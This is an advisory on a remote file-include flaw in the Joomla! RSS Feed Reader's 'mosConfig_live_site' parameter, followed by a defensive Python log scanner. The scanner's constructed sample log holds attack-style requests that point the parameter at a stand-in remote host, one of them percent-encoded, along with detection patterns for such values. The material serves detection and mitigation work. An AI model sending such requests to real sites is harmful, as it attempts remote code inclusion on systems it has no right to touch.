vendor: Joomla! RSS Feed Reader
by: Unknown
CVSS: 7.5 (HIGH)
Remote File Include
CWE:
Product Name: Joomla! RSS Feed Reader
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
Joomla! RSS Feed Reader Remote File Include Vulnerability
The Joomla! RSS Feed Reader contains a remote file-include vulnerability caused by insufficient sanitization of user-supplied input. An attacker can exploit it by injecting malicious code into the 'mosConfig_live_site' parameter of the 'admin.wmtrssreader.php' file. Successful exploitation could allow the attacker to compromise the application and the underlying system, potentially leading to further attacks.
Mitigation:
To mitigate this vulnerability, it is recommended to sanitize and validate user-supplied input before using it in file inclusion operations. Additionally, keeping the Joomla! RSS Feed Reader and all other software up to date with the latest security patches is essential to prevent exploitation.
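Since no patch exists, reviewing web server logs for requests that set this parameter is a useful complement to input validation. The following is an added example, not part of the original advisory or the component's code: it scans Combined Log Format lines for requests to 'admin.wmtrssreader.php' that supply 'mosConfig_live_site'. The log lines, addresses and the /PLACEHOLDER/ path prefix are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

SCRIPT = "admin.wmtrssreader.php"  # file named in the advisory
PARAM = "mosConfig_live_site"      # parameter named in the advisory

# Combined Log Format: client address, request target, response status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Value starts with a URL scheme or stream wrapper (2+ chars, so not "C:") or "//".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//)', re.I)

# Constructed sample lines; /PLACEHOLDER/ stands for the unknown install path.
TS = '- - [01/Jan/2024:10:00:00 +0000]'
SAMPLE_LOG = [
    f'203.0.113.7 {TS} "GET /PLACEHOLDER/{SCRIPT}?{PARAM}=http://host.invalid/x HTTP/1.1" 200 512',
    f'203.0.113.7 {TS} "GET /PLACEHOLDER/{SCRIPT}?{PARAM}=%2568ttp%253A%252F%252Fhost.invalid%252Fx HTTP/1.1" 200 512',
    f'198.51.100.4 {TS} "GET /index.php?option=com_content HTTP/1.1" 200 1024',
    f'198.51.100.9 {TS} "GET /PLACEHOLDER/{SCRIPT}?{PARAM}=abc HTTP/1.1" 403 0',
]

def fully_unquote(value, rounds=3):
    """Undo nested percent-encoding (bounded) so %2568ttp is read as http."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_line(line):
    """Return a finding dict if the line sets PARAM on SCRIPT, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not fully_unquote(url.path).lower().endswith("/" + SCRIPT):
        return None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == PARAM:
            value = fully_unquote(value)
            # A configuration variable set from the query string is suspect in
            # any form; a URL or wrapper value is the file-include case.
            kind = "url-or-wrapper" if REMOTE_RE.match(value) else "param-override"
            return {"ip": m.group("ip"), "kind": kind, "value": value,
                    "status": int(m.group("status"))}
    return None

def scan(lines):
    return [hit for hit in map(check_line, lines) if hit]
```

Access logs record only the query string, so a value sent in a POST body will not appear here and needs request-body logging or a filtering proxy to be seen.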